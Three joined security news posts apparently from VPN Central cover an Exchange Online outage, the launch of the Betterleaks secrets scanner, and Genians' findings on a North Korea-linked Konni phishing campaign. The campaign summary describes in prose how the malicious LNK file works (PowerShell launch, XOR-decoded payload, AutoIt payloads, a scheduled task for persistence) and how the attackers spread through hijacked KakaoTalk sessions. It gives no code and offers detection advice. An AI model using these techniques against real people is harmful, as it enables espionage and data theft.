Microsoft first acknowledged the issue through its Microsoft 365 status channels, saying it was investigating reports of mailbox access failures. Later, the company said telemetry suggested the issue was no longer occurring for affected users, while engineers continued to monitor service health and verify a sustained recovery.

A later update said the problem was tied to supporting network infrastructure. Microsoft said an underlying issue in that infrastructure caused service availability degradation across Exchange Online connection methods. The company has not yet published the full root cause, but it said that explanation will appear in the post-incident report.

For business customers, the incident mattered because Exchange Online sits at the center of daily email and calendar workflows. Even a partial outage can disrupt shared mailboxes, mobile sync, web access, and desktop productivity across departments. Microsoft advises administrators to monitor the Service health page in the Microsoft 365 admin center for incident timelines, impact details, and recovery updates.

What happened

What IT admins should do now

• Check Microsoft 365 admin center under Health > Service health for the latest incident notes.
• Confirm which access paths failed in your tenant, such as Outlook on the web, desktop Outlook, or mobile sync.
• Tell users whether the issue has been restored and ask them to retry sign-in before opening new support cases.
• Record the impact window for internal reporting, SLA tracking, or support review.

Why this outage drew attention

The incident did not appear limited to one app or one client type, which made it more disruptive than a narrow Outlook bug. Reports pointed to problems across multiple Exchange Online connection methods, and separate Microsoft 365 web access issues were also under investigation around the same time, including Office.com and some Copilot web sign-in pages.

Microsoft has already dealt with other Exchange Online disruptions in recent months, including earlier incidents involving mailbox access and client connectivity. That wider pattern will likely keep admins focused on incident response, fallback access methods, and Microsoft’s post-incident findings once the company publishes them.

FAQ

The post Microsoft investigates Exchange Online mailbox access outage affecting Outlook and web users appeared first on VPN Central.

Betterleaks looks like a serious new option for teams that already use Gitleaks or want a lightweight scanner for secret exposure. According to the official launch announcement, it keeps compatibility with older Gitleaks CLI options and configs while adding new detection and validation features.

That matters because secret leaks remain one of the easiest ways for attackers to gain access to cloud services, internal tools, and production systems. A scanner that fits into existing pipelines without forcing teams to rebuild workflows can lower friction and speed up adoption.

What Betterleaks is and why it exists

Betterleaks did not appear out of nowhere. In the official announcement, Rice says he built it after losing administrative control over the original Gitleaks repository, which pushed him to start fresh and build what he describes as a better open-source secrets scanner. He also says he joined Aikido Security as Head of Secrets Scanning, while Betterleaks remains open-source and supported by Aikido.

The project launched under the MIT license and focuses on scanning Git repos, files, and input passed through standard input. The GitHub page describes Betterleaks as a tool for detecting secrets like passwords, API keys, and tokens across repositories and files.

What Betterleaks adds over older secrets scanners

The official launch post says Betterleaks ships as a drop-in replacement for Gitleaks, but it does more than keep command compatibility. Aikido says the first release includes token efficiency detection, rule-defined validation, support for default encoding detection, a pure Go architecture, and parallelized Git scanning.

One of the more notable claims involves token efficiency scanning. The launch post says Betterleaks uses a technique based on BPE tokenization rather than standard entropy to identify likely secrets, and it reports a 98.6 percent recall rate for that method.

Validation also looks more flexible. Aikido says Betterleaks uses CEL, or Common Expression Language, to define validation logic, which should make it easier for contributors to add support for new providers without rebuilding deeper parts of the engine.

The project also skips CGO and Hyperscan dependencies. That pure Go approach should make deployment easier in varied environments, especially for teams that want a scanner they can move across developer laptops, CI jobs, and containers with less setup overhead.

Betterleaks at a glance

Source: Aikido Security launch post.

Why this could matter for AI-assisted coding

Aikido explicitly frames Betterleaks as a tool for the agentic era. The launch post says AI coding environments such as Claude Code, Codex, and Cursor often rely on CLI tools to retrieve targeted information efficiently, and Betterleaks can fit into those flows as a scanning utility for generated code or bug bounty workflows.

That angle gives Betterleaks a timely pitch. More teams now use AI tools to write, refactor, and move code quickly. When code moves faster, the risk of accidentally exposing credentials also rises. A secrets scanner that works well in automated and AI-heavy workflows could appeal to both security teams and developers.

Governance and backing

Aikido says Betterleaks remains independent and open-source even though the company sponsors development. The launch post also says the project uses a multi-maintainer model, with contributors who have experience at organizations including Red Hat, Amazon, and RBC.

That shared governance model may help reassure users who worry about project continuity. Open-source security tools often gain trust when maintenance does not depend on a single person.

What comes next

Aikido’s published roadmap for Betterleaks v2 includes broader scanning sources, LLM-assisted secret classification using anonymized data, auto-revocation of exposed credentials through provider APIs, permissions mapping, more performance work, and a flatter CEL-based configuration system with backward compatibility.

Those features are still future-facing, so teams should judge Betterleaks first on what it offers today rather than what may arrive later. Still, the roadmap shows that the project aims to become more than a basic scanner.

Key takeaways

• Betterleaks is a new open-source secrets scanner from the creator of Gitleaks.
• It scans files, directories, Git repositories, and stdin for exposed secrets.
• The project claims drop-in compatibility with existing Gitleaks configs and CLI options.
• Officially announced features include BPE-based token efficiency detection, CEL-based validation, pure Go portability, and parallel Git scanning.
• Aikido supports the project, but the scanner remains open-source under the MIT license.

FAQ

The post Betterleaks launches as a new open-source secrets scanner for files, directories, and Git repos appeared first on VPN Central.

The most important part of this campaign is what happens after the initial infection. The attackers did not stop at stealing data from the first victim. Genians says they also abused the victim’s KakaoTalk PC session to send malicious files to selected contacts, which made the second wave of attacks look far more trustworthy.

That matters because KakaoTalk remains one of the most widely used messaging platforms in South Korea, so a file that arrives from a known contact can look routine instead of suspicious. In this case, the social engineering appears highly targeted, with lures tied to North Korean human rights themes and recipients whose interests or work made the messages feel plausible.

How the Konni campaign works

According to Genians, the attack began with spear-phishing emails disguised as appointment notices for North Korean human rights lecturers. The messages carried an archive that contained a malicious LNK file dressed up to look like an ordinary document. When the target opened it, the file quietly launched PowerShell in the background and reached out to external infrastructure to pull down more malware.

The attackers then stayed on the infected system long enough to collect documents, user account details, and environment data. After that, they moved into the victim’s KakaoTalk PC application, selected specific contacts, and sent another malicious file disguised as a planning document related to North Korea-themed video content. That turned the original victim into a trusted relay point for the next stage of infection.

Genians says the broader operation deployed several RAT families, including EndRAT, RftRAT, and RemcosRAT, and used distributed command-and-control infrastructure tied to locations including Finland, Japan, and the Netherlands. Public reporting on the campaign also links Konni to Kimsuky or APT37-related activity, though attribution across North Korean clusters often varies by vendor.

Why the LNK file matters

The malicious shortcut file appears to do much more than launch a simple payload. Reporting based on the Genians analysis says the LNK executes a 32-bit PowerShell process through cmd.exe using the SysWOW64 path, which can help it blend in and potentially evade some controls. It also looks for the LNK file by size rather than name, so renaming the file does not break the infection chain.

Researchers say the shortcut then reads a hidden data block from a fixed offset inside the file and decodes it with a one-byte XOR key. The victim sees a decoy PDF, while the real attack continues in the background. The file then deletes itself, downloads a legitimate AutoIt interpreter alongside a malicious compiled AutoIt script, and creates a scheduled task that runs every minute for 365 days to maintain persistence.

That combination makes the attack harder to spot. The victim sees what looks like a normal document, while the malware hides behind common Windows components and long-lived scheduled execution. It also gives the attacker a stable foothold for reconnaissance, data theft, and lateral social engineering through KakaoTalk.

What makes this campaign more dangerous than ordinary phishing

This is not just a one-shot phishing attempt. It is a chained operation that mixes espionage, persistence, and trusted-channel abuse.

• The first lure arrives by email and looks relevant to the target’s interests.
• The first-stage file masquerades as a harmless document but launches PowerShell and downloads more tools.
• The attackers remain on the machine to collect data before pivoting.
• The victim’s KakaoTalk account becomes a new malware distribution channel.
• Persistence comes from scheduled tasks and AutoIt-based payloads.

Key indicators from the campaign

What defenders should do now

Organizations that rely on email and chat workflows should treat archive attachments carrying LNK files as high risk, especially when the file icon makes the shortcut look like a document. Security teams should also monitor for unusual process chains in which LNK execution leads to cmd.exe, PowerShell, scheduled task creation, or AutoIt-related activity. These steps follow directly from the behavior described in the Genians-backed reporting.

It is also worth watching messaging apps on endpoints, especially when they suddenly begin sending files or messages outside a user’s normal behavior. In this campaign, KakaoTalk was not just incidental software on the victim machine. It became part of the attacker’s distribution mechanism.

Teams should also review outbound connections to unusual domains and infrastructure tied to known command-and-control operations. Genians-linked reporting says the attackers used globally distributed infrastructure, which can complicate geolocation-based filtering and make the traffic appear less suspicious at first glance.

FAQ

The post Konni hackers hijack KakaoTalk accounts to spread malware in multi-stage phishing attacks appeared first on VPN Central.